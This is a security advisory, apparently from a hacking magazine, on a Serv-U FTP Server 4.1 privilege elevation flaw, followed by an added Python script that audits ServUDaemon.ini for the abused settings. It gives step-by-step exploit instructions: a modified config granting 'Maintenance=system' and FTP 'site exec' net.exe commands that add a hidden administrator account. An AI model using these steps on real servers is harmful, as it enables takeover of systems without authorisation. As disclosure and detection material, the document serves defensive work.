Serv-U FTP Server remote/local privilege elevation flaw

Serv-U FTP Server is FTP server software produced by RhinoSoft and is currently widely used around the world. My research found that the Serv-U FTP Server configuration is stored in the ServUDaemon.ini file in the Serv-U FTP Server file directory. If a locally restricted user, or a remote attacker who has normal privileges, can access the file and carefully construct the contents of ServUDaemon.ini, the FTP process can be used to execute arbitrary commands with system privileges on the system.

IV. Defect Analysis:
Serv-U FTP Server stores its configuration information in the ServUDaemon.ini file once users have been set up. This includes each user's permission information and accessible directories. A local limited user or remote attacker who can read and write the Serv-U FTP Server file directory can modify the ServUDaemon.ini file in that directory so that the FTP process executes arbitrary commands with FTP administrator privileges on the remote or local system. The flaw is not affected by the system version. (Installations where user information is stored in the system registry are not affected by this flaw.)

V. Test Method:

1. Local test
Assume that a local limited user can browse the Serv-U FTP Server file directory. Locate the ServUDaemon.ini file and open it with Notepad; the original file looks roughly as follows:
[GLOBAL]
version=4.1.0.0    // Serv-U FTP Server version number
processid=584
registrationkey=ueyz459wabr4lvrkikh4dyw9f8v4j/ahlvpok8tqokyz4d3wbymil1vkkjgdaelpdkswm5doxjsgw64yiypdo+ Wagnubuycb
[DOMAINS]
domain1=127.0.0.1| | 21|127.0.0.1|1|0    // host IP, domain name and port
[Domain1]
User1=zihuan|1|0
[User=zihuan|1]
Password=rfe8dfbe3f7ec27fb043d4305a04e6d2c6
Homedir=c:\    // directory the user can browse
timeout=600
access1=c:\| Rwamlcdp

If the ServUDaemon.ini file is modified to:

[GLOBAL]
version=4.1.0.0
processid=584
registrationkey=ueyz459wabr4lvrkikh4dyw9f8v4j/ahlvpok8tqokyz4d3wbymil1vkkjgdaelpdkswm5doxjsgw64yiypdo+ Wagnubuycb
[DOMAINS]
domain1=127.0.0.1| | 21|127.0.0.1|1|0
[Domain1]
User1=zihuan|1|0
[User=zihuan|1]
Password=rfe8dfbe3f7ec27fb043d4305a04e6d2c6
Homedir=c:\
timeout=600
Maintenance=system    // permission type
access1=c:\| Rwamelcdp

Compared with the original, the content above has one more line, "Maintenance=system" (the access1 flags in the listing also gain an "e"). Save the file once the modification is complete. Then log in to the Serv-U FTP Server with FTP and execute the following commands:

ftp> open IP
Connected to IP.
Serv-u FTP Server v4.1.0.0 for WinSock ready ...
User (IP:(none)): ID    // enter the constructed user
331 User name Okay, please send complete e-mail address as password.
Password: password    // password
230 User logged in, proceed.
ftp> cd winnt    // enter the Win2K winnt directory; on WinXP or Windows Server 2003 it is the Windows directory
Directory changed to /winnt
ftp> cd system32    // enter the system32 directory
Directory changed to /winnt/system32
ftp> quote site exec net.exe user zihuan zihuan /add    // use the system's net.exe to add a user
EXEC command Successful (tid=33).
ftp> quote site exec net.exe localgroup administrators zihuan /add    // promote to superuser

This adds a superuser named zihuan, with the password zihuan, on the local system. You can also use the quote site exec net.exe localgroup administrators user /add command to elevate the current user to the superuser group. You can, of course, execute any command on the system.
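
For administrators checking an existing installation, the following added example (not part of the original advisory and not RhinoSoft code) parses ServUDaemon.ini text and reports the two settings that differ in the modified file above: a Maintenance line on a user, and an access entry carrying the "E" flag. Treating "E" as the execute right is an assumption about the flag letters; the function name and the sample accounts are constructed for illustration.

```python
import configparser

# Constructed sample modelled on the modified file shown above; the
# registration key is a placeholder and the "guest" account is invented.
SAMPLE_INI = r"""
[GLOBAL]
Version=4.1.0.0
RegistrationKey=PLACEHOLDER
[DOMAINS]
Domain1=127.0.0.1||21|127.0.0.1|1|0
[Domain1]
User1=zihuan|1|0
User2=guest|1|0
[USER=zihuan|1]
HomeDir=c:\
Maintenance=System
Access1=c:\|RWAMELCDP
[USER=guest|1]
HomeDir=c:\ftp\pub
Access1=c:\ftp\pub|RL
"""

def audit_servu_ini(text):
    """Return (user, finding) tuples for risky per-user settings."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        if not section.lower().startswith("user="):
            continue  # only per-user sections are of interest here
        user = section.split("=", 1)[1].split("|", 1)[0]
        opts = cp[section]  # option names are lower-cased by configparser
        level = opts.get("maintenance", "").strip()
        if level:
            findings.append((user, f"Maintenance={level} (administrative account)"))
        for key, value in opts.items():
            if not key.startswith("access"):
                continue
            # Access entries are "<path>|<flags>"; assume E = execute right.
            path, _, flags = value.rpartition("|")
            if "E" in flags.strip().upper():
                findings.append((user, f"execute right on {path}"))
    return findings

if __name__ == "__main__":
    for user, finding in audit_servu_ini(SAMPLE_INI):
        print(f"{user}: {finding}")
```

Any account this reports that the administrator did not create deliberately indicates the configuration file has been altered; the file's directory should not be writable by limited or FTP users.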


Statement:

This article is only intended to describe possible security issues, and the author and Hacker X-Files magazine do not provide any guarantee or commitment regarding this security bulletin. Any direct or indirect consequences and losses arising from the dissemination and use of the information provided by this article are the responsibility of the user, and the author of this article shall not be liable for them. The author has the right to modify and interpret this security bulletin. If you wish to reproduce or disseminate this article, you must preserve its integrity, including all the contents of the copyright notice. Without the author's permission, the content of this bulletin may not be arbitrarily modified, added to or cut.
